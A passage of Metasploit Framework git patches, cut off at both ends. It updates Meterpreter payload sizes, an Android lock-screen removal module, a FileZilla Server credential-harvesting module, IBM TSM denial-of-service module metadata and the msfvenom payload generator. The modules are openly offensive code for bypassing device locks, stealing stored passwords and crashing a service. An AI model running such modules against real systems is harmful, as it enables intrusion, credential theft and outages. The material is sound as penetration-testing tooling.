+12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50226 + CachedSize = 51062 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 44369a42a9..f720e147fa 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index efdecac0bc..4e02d4ecf1 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 7988da15eb..67d4cbfe69 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50146 + CachedSize = 50978 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 35cca34308..8f59094b79 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index cf8c6f0fd1..488b28e773 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 32fe451235..1782e416cb 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb index 831e479db2..9b299268cf 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb index f84eac31bd..33c1f06b81 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit3 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb index 100760fd6d..8cdbcd13e4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb index 7d493b49e9..43a55d8c01 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb index 951dad4425..5207a0b0d4 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1189955 + CachedSize = 1190467 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb index 519e5ed6d3..ea5cab3cc8 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb index 7ed67c7a06..5dddb7f1c8 100644 --- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 1188911 + CachedSize = 1189423 include Msf::Payload::TransportConfig include Msf::Payload::Windows From ed5cf821b2dd21200791fdc9c93acf41300e6b90 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 23:21:20 -0600 Subject: [PATCH 315/686] bump payloads to 1.1.0 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index ea2654ff4a..32690ca571 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.24) + metasploit-payloads (= 1.1.0) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.24) + metasploit-payloads (1.1.0) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 32bcb1cd36..0aba1e8d59 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' + spec.add_runtime_dependency 'metasploit-payloads', '1.1.0' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 9791e6668349c2be6c064b796097e034d842a726 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Tue, 12 Jan 2016 07:50:31 +0000 Subject: [PATCH 316/686] fix remove_lock to work with 4.3 devices --- modules/post/android/manage/remove_lock.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/post/android/manage/remove_lock.rb b/modules/post/android/manage/remove_lock.rb index 817cc60fb4..2c21b86270 100644 --- a/modules/post/android/manage/remove_lock.rb +++ b/modules/post/android/manage/remove_lock.rb @@ -63,13 +63,12 @@ class Metasploit4 < Msf::Post return end - output = cmd_exec('am start -n com.android.settings/com.android.settings.ChooseLockGeneric --ez confirm_credentials false --ei lockscreen.password_type 0 --activity-clear-task') - if output =~ /Error:/ - print_error("The Intent could not be started") - vprint_status("Command output: #{output}") - else + result = session.android.activity_start('intent:#Intent;launchFlags=0x8000;component=com.android.settings/.ChooseLockGeneric;i.lockscreen.password_type=0;B.confirm_credentials=false;end') + if result.nil? print_good("Intent started, the lock screen should now be a dud.") print_good("Go ahead and manually swipe or provide any pin/password/pattern to continue.") + else + print_error("The Intent could not be started: #{result}") end end From e738b5922d74a823687bac558fb2b54ca47f08a9 Mon Sep 17 00:00:00 2001 From: Tim <timrlw@gmail.com> Date: Tue, 12 Jan 2016 08:13:29 +0000 Subject: [PATCH 317/686] fix play_youtube to work on Android --- modules/post/multi/manage/play_youtube.rb | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index 0c5d85ce3d..3d44dba25c 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb @@ -94,6 +94,19 @@ class Metasploit3 < Msf::Post true end + # + # The Android version is launched via an Intent + # + def android_start_video(id) + intenturl = "intent://youtube.com/watch?v=#{id}&autoplay=1#Intent;scheme=http;action=android.intent.action.VIEW;end" + begin + session.android.activity_start(intenturl) + rescue Rex::Post::Meterpreter::RequestError => e + return false + end + true + end + def start_video(id) case session.platform when /osx/ @@ -102,6 +115,8 @@ class Metasploit3 < Msf::Post win_start_video(id) when /linux/ linux_start_video(id) + when /android/ + android_start_video(id) end end From bc74ceb8c51b8e54077fa55442d2b938a5cf98ce Mon Sep 17 00:00:00 2001 From: nk <nk@nikaiw.io> Date: Thu, 11 Feb 2016 15:56:58 +0100 Subject: [PATCH 318/686] Handle errors when parsing interfaces.xml, add check for several locations --- .../gather/credentials/filezilla_server.rb | 80 ++++++++++++------- 1 file changed, 53 insertions(+), 27 deletions(-) diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb index 4fd3ca037e..c2f67dffe4 100644 --- a/modules/post/windows/gather/credentials/filezilla_server.rb +++ b/modules/post/windows/gather/credentials/filezilla_server.rb @@ -37,36 +37,60 @@ class Metasploit3 < Msf::Post return end - @progs = "#{session.sys.config.getenv('ProgramFiles')}\\" + progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432') + locations = [] + progfiles_env.each do |k, v| + next if v.blank? + locations << v + "\\FileZilla Server\\" + end - filezilla = check_filezilla + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\FileZilla Server") + open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + locations << open_key.query_value("install_dir").data + "\\" + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server") + open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + locations << open_key.query_value("install_dir").data + "\\" + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + + + locations = locations.uniq + filezilla = check_filezilla(locations) get_filezilla_creds(filezilla) if filezilla end - def check_filezilla + def check_filezilla(locations) paths = [] - path = @progs + "FileZilla Server\\" - - print_status("Checking for Filezilla Server directory in: #{path}") - begin - session.fs.dir.entries(path) + locations.each do |location| + print_status("Checking for Filezilla Server directory in: #{location}") + begin + session.fs.dir.foreach("#{location}") do |fdir| + ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| + if fdir == xmlfile + filepath = location + xmlfile + print_status("Configuration file found: #{filepath}") + paths << filepath + end + end + end + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) + end + end rescue ::Exception => e print_error(e.to_s) return end - session.fs.dir.foreach(path) do |fdir| - ['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile| - if fdir == xmlfile - filepath = path + xmlfile - vprint_status("Configuration file found: #{filepath}") - paths << filepath - end - end - end - if !paths.empty? print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") print_line @@ -249,16 +273,18 @@ class Metasploit3 < Msf::Post configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'], config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']] + begin + lastser = parse_interface(fsi_xml) + lastserver << [lastser['ip'], lastser['port'], lastser['password']] + vprint_status("Last Server Information:") + vprint_status(" IP: #{lastser['ip']}") + vprint_status(" Port: #{lastser['port']}") + vprint_status(" Password: #{lastser['password']}") + vprint_line - lastser = parse_interface(fsi_xml) - lastserver << [lastser['ip'], lastser['port'], lastser['password']] - - vprint_status("Last Server Information:") - vprint_status(" IP: #{lastser['ip']}") - vprint_status(" Port: #{lastser['port']}") - vprint_status(" Password: #{lastser['password']}") - vprint_line - + rescue + vprint_error("Could not parse FileZilla Server Interface.xml") + end p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv, "filezilla_server_credentials.csv", "FileZilla FTP Server Credentials") print_status("Credentials saved in: #{p.to_s}") From 31210938984ee4543a7ccbc3959df1106886c389 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Thu, 11 Feb 2016 22:04:05 -0600 Subject: [PATCH 319/686] Update metadata, plus other minor changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 27 ++++++++++------------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 6d0fc435e0..f04adddfdf 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -12,11 +12,11 @@ class Metasploit4 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Name' => " Server Opcode 0x534 Denial of Service", 'Description' => %q{ - This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server - when dealing with packets triggering the opcode 0x534 handler - }, + This module exploits a denial of service condition present in IBM Tivoli Storage Manager + FastBack Server when dealing with packets triggering the opcode 0x534 handler. + }, 'License' => MSF_LICENSE, 'Author' => [ @@ -25,16 +25,16 @@ class Metasploit4 < Msf::Auxiliary ], 'References' => [ - ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ['EDB', '38979'], + ['OSVDB', '132307'] ], 'DisclosureDate' => "Dec 15 2015", - 'DefaultOptions' => {} - )) + )) - register_options( - [ - Opt::RPORT(11460) - ], self.class) + register_options( + [ + Opt::RPORT(11460) + ], self.class) end def tv_pkt(opcode, p1="", p2="", p3="") @@ -60,12 +60,9 @@ class Metasploit4 < Msf::Auxiliary end def run - ip = datastore['RHOST'] - port = datastore['RPORT'] - target_opcode = 0x534 connect - print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Connected to: #{rhost} port: #{rport}") print_status("Sending malicious packet") p = tv_pkt(target_opcode, From 541e3972f0e4c9dfb62f74b5161d01cba7222816 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Fri, 12 Feb 2016 10:49:18 -0600 Subject: [PATCH 320/686] No real reason for this check And it breaks stuff when msfvenom is run as a symlink --- msfvenom | 616 +++++++++++++++++++++++++++---------------------------- 1 file changed, 306 insertions(+), 310 deletions(-) diff --git a/msfvenom b/msfvenom index 36a8f7be05..6c25288081 100755 --- a/msfvenom +++ b/msfvenom @@ -1,365 +1,361 @@ #!/usr/bin/env ruby # -*- coding: binary -*- -if __FILE__ == $0 +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end - msfbase = __FILE__ - while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +require 'msfenv' + +$:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] + +require 'rex' +require 'msf/ui' +require 'msf/base' +require 'msf/core/payload_generator' + + +class MsfVenomError < StandardError; end +class UsageError < MsfVenomError; end +class NoTemplateError < MsfVenomError; end +class IncompatibleError < MsfVenomError; end + + +require 'optparse' + + +# Creates a new framework object. +# +# @note Ignores any previously cached value. +# @param (see ::Msf::Simple::Framework.create) +# @return [Msf::Framework] +def init_framework(create_opts={}) + create_opts[:module_types] ||= [ + ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP + ] + @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) +end + +# Cached framework object +# +# @return [Msf::Framework] +def framework + return @framework if @framework + + init_framework + + @framework +end + + +def parse_args(args) + opts = {} + datastore = {} + opt = OptionParser.new + banner = "MsfVenom - a Metasploit standalone payload generator.\n" + banner << "Also a replacement for msfpayload and msfencode.\n" + banner << "Usage: #{$0} [options] <var=val>" + opt.banner = banner + opt.separator('') + opt.separator('Options:') + + opt.on('-p', '--payload <payload>', String, + 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| + if p == '-' + opts[:payload] = 'stdin' + else + opts[:payload] = p + end end - $:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) - require 'msfenv' - - $:.unshift(ENV['MSF_LOCAL_LIB']) if ENV['MSF_LOCAL_LIB'] - - require 'rex' - require 'msf/ui' - require 'msf/base' - require 'msf/core/payload_generator' - - - class MsfVenomError < StandardError; end - class UsageError < MsfVenomError; end - class NoTemplateError < MsfVenomError; end - class IncompatibleError < MsfVenomError; end - - - require 'optparse' - - - # Creates a new framework object. - # - # @note Ignores any previously cached value. - # @param (see ::Msf::Simple::Framework.create) - # @return [Msf::Framework] - def init_framework(create_opts={}) - create_opts[:module_types] ||= [ - ::Msf::MODULE_PAYLOAD, ::Msf::MODULE_ENCODER, ::Msf::MODULE_NOP - ] - @framework = ::Msf::Simple::Framework.create(create_opts.merge('DisableDatabase' => true)) + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true end - # Cached framework object - # - # @return [Msf::Framework] - def framework - return @framework if @framework - - init_framework - - @framework + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + if l.nil? or l.empty? + l = ["all"] + end + opts[:list] = l end + opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opts[:nops] = n.to_i + end - def parse_args(args) - opts = {} - datastore = {} - opt = OptionParser.new - banner = "MsfVenom - a Metasploit standalone payload generator.\n" - banner << "Also a replacement for msfpayload and msfencode.\n" - banner << "Usage: #{$0} [options] <var=val>" - opt.banner = banner - opt.separator('') - opt.separator('Options:') + opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| + opts[:format] = f + end - opt.on('-p', '--payload <payload>', String, - 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| - if p == '-' - opts[:payload] = 'stdin' - else - opts[:payload] = p - end + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| + opts[:encoder] = e + end + + opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| + opts[:arch] = a + end + + opt.on('--platform <platform>', String, 'The platform of the payload') do |l| + opts[:platform] = l + end + + opt.on('--help-platforms', String, 'List available platforms') do + init_framework(:module_types => []) + supported_platforms = [] + Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} + msg = "Platforms\n" + + "\t" + supported_platforms * ", " + raise UsageError, msg + end + + opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| + opts[:space] = s + end + + opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + + opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opts[:badchars] = Rex::Text.hex_to_raw(b) + end + + opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| + opts[:iterations] = i + end + + opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| + opts[:add_code] = x + end + + opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| + opts[:template] = x + end + + opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do + opts[:keep] = true + end + + opt.on('-o', '--out <path>', 'Save the payload') do |x| + opts[:out] = x + end + + opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| + opts[:var_name] = x + end + + opt.on('--smallest', 'Generate the smallest possible payload') do + opts[:smallest] = true + end + + opt.on_tail('-h', '--help', 'Show this message') do + raise UsageError, "#{opt}" + end + + begin + opt.parse!(args) + rescue OptionParser::InvalidOption => e + raise UsageError, "Invalid option\n#{opt}" + rescue OptionParser::MissingArgument => e + raise UsageError, "Missing required argument for option\n#{opt}" + end + + if opts.empty? + raise UsageError, "No options\n#{opt}" + end + + if args + args.each do |x| + k,v = x.split('=', 2) + datastore[k.upcase] = v.to_s end - - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true + if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? + datastore['LHOST'] = Rex::Socket.source_address end + end - opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| - if l.nil? or l.empty? - l = ["all"] - end - opts[:list] = l - end - - opt.on('-n', '--nopsled <length>', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| - opts[:nops] = n.to_i - end - - opt.on('-f', '--format <format>', String, "Output format (use --help-formats for a list)") do |f| - opts[:format] = f - end - - opt.on('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - - opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e| - opts[:encoder] = e - end - - opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a| - opts[:arch] = a - end - - opt.on('--platform <platform>', String, 'The platform of the payload') do |l| - opts[:platform] = l - end - - opt.on('--help-platforms', String, 'List available platforms') do - init_framework(:module_types => []) - supported_platforms = [] - Msf::Module::Platform.subclasses.each {|c| supported_platforms << "#{c.realname.downcase}"} - msg = "Platforms\n" + - "\t" + supported_platforms * ", " - raise UsageError, msg - end - - opt.on('-s', '--space <length>', Integer, 'The maximum size of the resulting payload') do |s| - opts[:space] = s - end - - opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| - opts[:encoder_space] = s - end - - opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| - opts[:badchars] = Rex::Text.hex_to_raw(b) - end - - opt.on('-i', '--iterations <count>', Integer, 'The number of times to encode the payload') do |i| - opts[:iterations] = i - end - - opt.on('-c', '--add-code <path>', String, 'Specify an additional win32 shellcode file to include') do |x| - opts[:add_code] = x - end - - opt.on('-x', '--template <path>', String, 'Specify a custom executable file to use as a template') do |x| - opts[:template] = x - end - - opt.on('-k', '--keep', 'Preserve the template behavior and inject the payload as a new thread') do - opts[:keep] = true - end - - opt.on('-o', '--out <path>', 'Save the payload') do |x| - opts[:out] = x - end - - opt.on('-v', '--var-name <name>', String, 'Specify a custom variable name to use for certain output formats') do |x| - opts[:var_name] = x - end - - opt.on('--smallest', 'Generate the smallest possible payload') do - opts[:smallest] = true - end - - opt.on_tail('-h', '--help', 'Show this message') do - raise UsageError, "#{opt}" - end + if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin + opts[:payload] = "stdin" + end + if opts[:payload] == 'stdin' and not opts[:list] + $stderr.puts "Attempting to read payload from STDIN..." begin - opt.parse!(args) - rescue OptionParser::InvalidOption => e - raise UsageError, "Invalid option\n#{opt}" - rescue OptionParser::MissingArgument => e - raise UsageError, "Missing required argument for option\n#{opt}" - end - - if opts.empty? - raise UsageError, "No options\n#{opt}" - end - - if args - args.each do |x| - k,v = x.split('=', 2) - datastore[k.upcase] = v.to_s - end - if opts[:payload].to_s =~ /[\_\/]reverse/ and datastore['LHOST'].nil? - datastore['LHOST'] = Rex::Socket.source_address + ::Timeout.timeout(30) do + opts[:stdin] = payload_stdin end + rescue Timeout::Error + opts[:stdin] = '' end - - if opts[:payload].nil? # if no payload option is selected assume we are reading it from stdin - opts[:payload] = "stdin" - end - - if opts[:payload] == 'stdin' and not opts[:list] - $stderr.puts "Attempting to read payload from STDIN..." - begin - ::Timeout.timeout(30) do - opts[:stdin] = payload_stdin - end - rescue Timeout::Error - opts[:stdin] = '' - end - end - - opts[:datastore] = datastore - - opts end + opts[:datastore] = datastore - # Read a raw payload from stdin (or whatever IO object we're currently - # using as stdin, see {#initialize}) - # - # @return [String] - def payload_stdin - @in = $stdin - @in.binmode - payload = @in.read - payload - end + opts +end - def dump_payloads - init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", - 'Columns' => - [ - "Name", - "Description" - ]) - framework.payloads.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } +# Read a raw payload from stdin (or whatever IO object we're currently +# using as stdin, see {#initialize}) +# +# @return [String] +def payload_stdin + @in = $stdin + @in.binmode + payload = @in.read + payload +end - "\n" + tbl.to_s + "\n" - end +def dump_payloads + init_framework(:module_types => [ ::Msf::MODULE_PAYLOAD ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Payloads (#{framework.stats.num_payloads} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - def dump_encoders(arch = nil) - init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), - 'Columns' => - [ - "Name", - "Rank", - "Description" - ]) - cnt = 0 + framework.payloads.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - framework.encoders.each_module( - 'Arch' => arch ? arch.split(',') : nil) { |name, mod| + "\n" + tbl.to_s + "\n" +end + +def dump_encoders(arch = nil) + init_framework(:module_types => [ ::Msf::MODULE_ENCODER ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework Encoders" + ((arch) ? " (architectures: #{arch})" : ""), + 'Columns' => + [ + "Name", + "Rank", + "Description" + ]) + cnt = 0 + + framework.encoders.each_module( + 'Arch' => arch ? arch.split(',') : nil) { |name, mod| tbl << [ name, mod.rank_to_s, mod.new.name ] cnt += 1 } (cnt > 0) ? "\n" + tbl.to_s + "\n" : "\nNo compatible encoders found.\n\n" - end +end - def dump_nops - init_framework(:module_types => [ ::Msf::MODULE_NOP ]) - tbl = Rex::Ui::Text::Table.new( - 'Indent' => 4, - 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", - 'Columns' => - [ - "Name", - "Description" - ]) +def dump_nops + init_framework(:module_types => [ ::Msf::MODULE_NOP ]) + tbl = Rex::Ui::Text::Table.new( + 'Indent' => 4, + 'Header' => "Framework NOPs (#{framework.stats.num_nops} total)", + 'Columns' => + [ + "Name", + "Description" + ]) - framework.nops.each_module { |name, mod| - tbl << [ name, mod.new.description.split.join(' ') ] - } + framework.nops.each_module { |name, mod| + tbl << [ name, mod.new.description.split.join(' ') ] + } - "\n" + tbl.to_s + "\n" - end + "\n" + tbl.to_s + "\n" +end - begin - generator_opts = parse_args(ARGV) - rescue MsfVenomError, Msf::OptionValidateError => e - $stderr.puts "Error: #{e.message}" - exit(1) - end +begin + generator_opts = parse_args(ARGV) +rescue MsfVenomError, Msf::OptionValidateError => e + $stderr.puts "Error: #{e.message}" + exit(1) +end - if generator_opts[:list] - generator_opts[:list].each do |mod| - case mod.downcase - when "payloads", "payload", "p" - $stdout.puts dump_payloads - when "encoders", "encoder", "e" - $stdout.puts dump_encoders(generator_opts[:arch]) - when "nops", "nop", "n" - $stdout.puts dump_nops - when "all" - # Init here so #dump_payloads doesn't create a framework with - # only payloads, etc. - init_framework - $stdout.puts dump_payloads - $stdout.puts dump_encoders - $stdout.puts dump_nops - else - $stderr.puts "Invalid module type. These are 